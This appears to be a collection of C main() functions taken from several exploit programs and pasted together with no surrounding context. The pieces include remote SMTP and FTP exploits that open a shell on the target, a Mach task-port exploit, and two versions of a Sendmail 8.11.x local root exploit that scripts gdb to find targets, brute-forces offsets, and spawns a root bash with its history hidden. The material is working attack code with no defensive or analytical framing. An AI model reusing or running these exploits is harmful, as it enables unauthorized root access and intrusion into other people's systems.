int main(int argc, char **argv)
{
int sock = 0, npad = 0;
u_int retloc = 0, retaddr = 0;
char *host = NULL;
if(parse_args(argc, argv, &host, &npad, &retloc, &retaddr))
bye("Usage: %s < host > < padding > < retloc > < retaddr >\n", argv[0]);
printf("--{ Smack 1.oohaah\n\n");
sock = conn(host, SMTP_PORT);
printf("--{ definitely, adv.:\n"
"--{ 1. Having distinct limits\n"
"--{ 2. Indisputable; certain\n"
"--{ 3. Clearly defined; explicitly precise\n\n"
);
sploit(sock, npad, retloc, retaddr);
printf("--{ Attempting to redefine the meaning of 'definitely'\n\n");
shell(host, SHELL_PORT);
return EXIT_SUCCESS;
}
int main(int argc, char **argv)
{
int sock = 0;
args argy;
memset(&argy, 0, sizeof(argy));
argy.align = ALIGN;
argy.port = FTP_PORT;
argy.remote_file = REMOTE_FILE;
parse_args(argc, argv, &argy);
sock = conn(argy.host, argy.port, SOCK_DGRAM);
sploit(&argy, sock);
sleep(2);
printf("triggering overwritten jumpslot\n\n");
trigger_retloc(sock);
sleep(1);
close(sock);
shell(argy.host, SHELL_PORT);
return EXIT_SUCCESS;
}
int main(int argc, char **argv)
{
int sock = 0;
args args;
memset(&args, 0, sizeof(args));
parse_args(argc, argv, &args);
sock = conn(args.host, args.port);
login(args.user, args.pass, sock);
sploit(&args, sock);
close(sock);
sleep(20);
shell(args.host, SHELL_PORT);
return 0;
}
int main(int argc, char** argv) {
setup_shared_port();
pid_t child_pid = fork();
if (child_pid == -1) {
FAIL("forking");
}
if (child_pid == 0) {
mach_port_t shared_port_child = recover_shared_port_child();
do_child(shared_port_child);
} else {
mach_port_t shared_port_parent = recover_shared_port_parent();
mach_port_t child_task_port = do_parent(shared_port_parent);
sploit(child_pid, child_task_port);
}
return 0;
}
int main(int argc, char *argv[])
{
char victim[256] = SM;
char vict[256];
char gscr[256];
char path[256];
char d[256];
struct stat st;
FILE *f;
char buf[256];
int got;
struct target t[1024];
uint off, ep, l;
int i,j;
int offset = -16384;
int esp;
int depth = 32;
int brute = 0;
/* rootshell (if argv[0] == NULL) */
if (!*argv) {
/* open stdin and stdout */
dup2(2, 0);
dup2(2, 1);
setuid(0); /* regain root privs */
setgid(0);
/* send signal to parent that exploit is done */
kill(getppid(), SIGUSR1);
/* l-a-m-e ;) */
printf("\nVoila babe, entering rootshell!\nEnjoy!\n"); fflush(stdout);
chdir("/");
system("/usr/bin/id");
setenv("BASH_HISTORY", "/dev/null", 1);
execl("/bin/bash", "-bash", NULL);
}
printf("\n...-=[ Sendmail 8.11.x exploit, (c)oded by [email protected] [sd@ircnet], 2001 ]=-...\n"
" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n");
while ( ( i = getopt(argc, argv, "hd:o:v:t:b") ) != EOF) {
switch (i) {
case 'd':
if ((!optarg) || (sscanf(optarg, "%d", &depth) != 1))
return use(argv[0]);
break;
case 'o':
if ((!optarg) || (sscanf(optarg, "%d", &offset) != 1))
return use(argv[0]);
break;
case 'v':
if (!optarg) return use(argv[0]);
strcpy(victim, optarg);
break;
case 't':
if (!optarg) return use(argv[0]);
strcpy(ourdir, optarg);
break;
case 'b':
brute++;
break;
case 'h':
default:
return use(argv[0]);
}
}
if (brute) printf("[*] Using brute force, this may take some time\n");
/* create full path to rootshell, cause
sendmail will change it's cwd */
path[0] = 0;
if (argv[0][0] != '/') {
getcwd(path, 256);
}
/* construct shellcode */
sprintf(scode, "%s%s/%s", shellcode, path, argv[0]);
/* get stack frame */
esp = get_esp();
close(0);
signal(SIGUSR1, sigusr);
/* remove old stuff */
giveup(-1);
printf( "[*] Victim = %s\n"
"[*] Depth = %d\n"
"[*] Offset = %d\n"
"[*] Temp = %s\n"
"[*] ESP = 0x%08x\n",
victim,
depth,
offset,
ourdir,
esp);
stat(victim, &st);
if ((st.st_mode & S_ISUID) == 0) {
printf("[-] Bad: %s isn't suid ;(\n", victim);
}
if (access(victim, R_OK + X_OK + F_OK) < 0) {
printf("[-] Bad: We haven't access to %s !\n", victim);
}
if (mkdir(ourdir, 0777) < 0) {
perror("[-] Can't create our tempdir!\n");
giveup(1);
}
printf("[+] Created %s\n", ourdir);
sprintf(buf, "%s -R %s | grep setuid", OBJDUMP, victim);
f = popen(buf, "r");
if (fscanf(f, "%x", &got) != 1) {
pclose(f);
printf("[-] Cannot get setuid() GOT\n");
giveup(1);
}
/* get GOT */
pclose(f);
printf("[+] Step 1. setuid() got = 0x%08x\n", got);
sprintf(vict, "%s/sm", ourdir);
printf("[*] Step 2. Copying %s to %s...", victim, vict); fflush(stdout);
sprintf(buf, "/bin/cp -f %s %s", victim, vict);
system(buf);
if (access(vict, R_OK + X_OK + F_OK) < 0) {
perror("Failed");
giveup(1);
}
printf("OK\n");
/* disassemble & find targets*/
printf("[*] Step 3. Disassembling %s...", vict); fflush(stdout);
if (!brute) {
sprintf(buf, DLINE, DLINEA);
} else {
sprintf(buf, BRUTE_DLINE, BRUTE_DLINEA);
}
f = popen(buf, "r");
i = 0;
while (fgets(buf, 256, f)) {
int k, dontadd = 0;
if (sscanf(buf, "%x: %s %s %s %s %s %s 0x%x,%s\n",
&ep, d, d, d, d, d, d, &off, d) == 9) {
/* same value ? */
for (k=0; k < i; k++) {
if (t[k].off == off) dontadd++;
}
/* new value ? */
if (!dontadd) {
/* add it to table */
t[i].off = off;
t[i++].brk = ep;
}
}
}
pclose(f);
printf("OK, found %d targets\n", i);
/* gdb every target and look for theyr VECT */
printf("[*] Step 4. Exploiting %d targets:\n", i); fflush(stdout);
sprintf(gscr, "%s/gdb", ourdir);
off = 0;
for (j=0; j < i; j++) {
/* create gdb script */
f = fopen(gscr, "w+");
if (!f) {
printf("Cannot create gdb script\n");
giveup(1);
}
fprintf(f, "break *0x%x\nr -d1-1.1\nx/x 0x%x\n", t[j].brk, t[j].off);
fclose(f);
sprintf(buf, "%s -batch -x %s %s 2> /dev/null", GDB, gscr, vict);
f = popen(buf, "r");
if (!f) {
printf("Failed to spawn gdb!\n");
giveup(1);
}
/* scan gdb's output */
while (1) {
char buf[256];
char *p;
t[j].vect = 0;
p = fgets(buf, 256, f);
if (!p) break;
if (sscanf(p, "0x%x %s 0x%x", &ep, d, &l) == 3) {
t[j].vect = l;
off++;
break;
}
}
pclose(f);
if (t[j].vect) {
int pid;
printf("[%d] (%d%% of targets) GOT=0x%08x, VECT=0x%08x, offset=%d\n", j, j*100/i , got, t[j].vect, offset);
fflush(stdout);
pid = fork();
if (pid == 0) {
close(1);
sploit(victim, got, t[j].vect, esp + offset);
}
/* wait until sendmail finishes (expoit failed)
or until SIGUSR arrives */
wait(NULL);
/* exploited ?? */
if (exploited) {
wait(NULL); /* kill zombie */
printf("Thanx for choosing sd's products ;)\n");
exit(0);
}
}
}
printf("[-] All targets failed, probably not vulnerable ;(\n");
giveup(1);
}
int main(int argc, char *argv[]) {
char victim[256] = SM;
char vict[256],gscr[256],
path[256],d[256],buf[256];
struct stat st;
FILE *f;
struct target t[1024];
uint off,ep,l;
int i,j,got,esp;
int offset = -16384;
int depth = 32;
int brute = 0;
if (!*argv) {
dup2(2, 0);
dup2(2, 1);
setuid(0);
setgid(0);
kill(getppid(), SIGUSR1);
printf(
"------(*)>+== "
"ENTERING ROOT SHELL"
" ==+<(*)------"
);
fflush(stdout);
chdir("/");
setenv("PATH",
"/bin:/usr/bin:/usr/local/bin:"
"/sbin:/usr/sbin:/usr/local/sbin:"
"/opt/bin:${PATH}",1);
setenv("BASH_HISTORY",
"/dev/null", 1);
execl("/bin/bash", "-bash", NULL);
}
printf(
" ------------------------------------------------\n"
" Sendmail 8.11.x linux i386 exploit \n"
" wroten by [email protected] [sd@ircnet], \n"
" fixed by [email protected] \n"
" ------------------------------------------------\n"
" type \"%s -h\" to get help\n",argv[0]
);
while ((i=getopt(argc,argv,"hd:o:v:t:b"))!=EOF){
switch (i) {
case 'd':
if ((!optarg)||(sscanf(optarg,"%d",&depth)!=1))
return use(argv[0]);
break;
case 'o':
if ((!optarg)||(sscanf(optarg,"%d",&offset)!=1))
return use(argv[0]);
break;
case 'v':
if (!optarg)
return use(argv[0]);
strcpy(victim,optarg);
break;
case 't':
if (!optarg)
return use(argv[0]);
strcpy(ourdir, optarg);
break;
case 'b':
brute++;
break;
case 'h':
default:
return use(argv[0]);
}
}
if (brute)
printf(
"[*] brute force "
"to 20-30mins\n");
path[0] = 0;
if (argv[0][0] != '/') {
getcwd(path, 256);
}
sprintf(scode, "%s%s/%s",
shellcode, path, argv[0]);
esp = get_esp();
close(0);
signal(SIGUSR1, sigusr);
giveup(-1);
printf(
" [Victim=%s][Depth=%d][Offset=%d]\n"
" [Temp=%s][Offset=%d][ESP=0x%08x]\n",
victim, depth, offset, ourdir, esp
);
stat(victim, &st);
if ((st.st_mode & S_ISUID) == 0) {
printf("[!] Error: %s doesn't have SUID mode\n",
victim);
}
if (access(victim, R_OK + X_OK + F_OK) < 0) {
printf("[!] Error: %s must exist, have mode +rx\n",
victim);
}
if (mkdir(ourdir, 0777) < 0) {
perror("[!] Error: creating temporary directory\n");
giveup(1);
}
//printf("[*] creating temp directory - %s\n",
// ourdir);
sprintf(buf, "%s -R %s | %s setuid",
OBJDUMP, victim, GREP);
f = popen(buf, "r");
if (fscanf(f, "%x", &got) != 1) {
pclose(f);
printf("[!] Error: cannot get "
"setuid() GOT\n");
giveup(1);
}
pclose(f);
printf("[*] --> Step 1. setuid() "
"[got=0x%08x]\n", got);
sprintf(vict, "%s/sm", ourdir);
printf("[*] --> Step 2. copy "
"[%s->%s]\n", victim, vict);
fflush(stdout);
sprintf(buf, "%s -f %s %s",
COPYCMD, victim, vict);
system(buf);
if (access(vict,R_OK+X_OK+F_OK)<0){
printf(
"[!] Error: copy victim to out temp\n");
giveup(1);
}
printf(
"[*] --> Step 3. disassm our "
"[%s]\n", vict);
fflush(stdout);
if (!brute) {
sprintf(buf,DLINE,DLINEA);
} else {
sprintf(buf,BRUTE_DLINE,BRUTE_DLINEA);
}
f = popen(buf, "r");
i = 0;
while (fgets(buf,256,f)) {
int k, dontadd=0;
if (sscanf(buf,
"%x: %s %s %s %s %s %s 0x%x,%s\n",
&ep,d,d,d,d,d,d,&off,d)==9){
for (k=0;k<i;k++){
if (t[k].off==off)
dontadd++;
}
if (!dontadd) {
t[i].off = off;
t[i++].brk = ep;
}
}
}
pclose(f);
sprintf(gscr, "%s/gdb", ourdir);
off = 0;
for (j=0; j < i; j++) {
f = fopen(gscr, "w+");
if (!f) {
printf("[!] Error: Cannot create gdb script\n");
giveup(1);
}
fprintf(f,
"break *0x%x\nr -d1-1.1\nx/x 0x%x\n",
t[j].brk, t[j].off);
fclose(f);
sprintf(buf,
"%s -batch -x %s %s 2> /dev/null",
GDB, gscr, vict);
f = popen(buf, "r");
if (!f) {
printf("[!] Error: Failed to spawn gdb!\n");
giveup(1);
}
while (1) {
char buf[256];
char *p;
t[j].vect = 0;
p = fgets(buf, 256, f);
if (!p) break;
if (sscanf(p,"0x%x %s 0x%x",&ep,d,&l)==3){
t[j].vect = l;
off++;
break;
}
}
pclose(f);
if (t[j].vect) {
int pid;
printf(" ++[%d/%d](%d%%) "
"GOT=0x%08x,VECT=0x%08x,"
"OFF=%d\n", j, i, j*100/i,
got, t[j].vect, offset);
fflush(stdout);
pid = fork();
if (pid == 0) {
close(1);
sploit(victim,got,t[j].vect,esp+offset);
}
wait(NULL);
if (exploited) {
wait(NULL);
printf(" [-*-] We rule! BYE! [-*-]\n");
exit(0);
}
}
}
printf(
"[!] ERROR: all targets failed,"
"probably not buggie\n");
giveup(1);
}
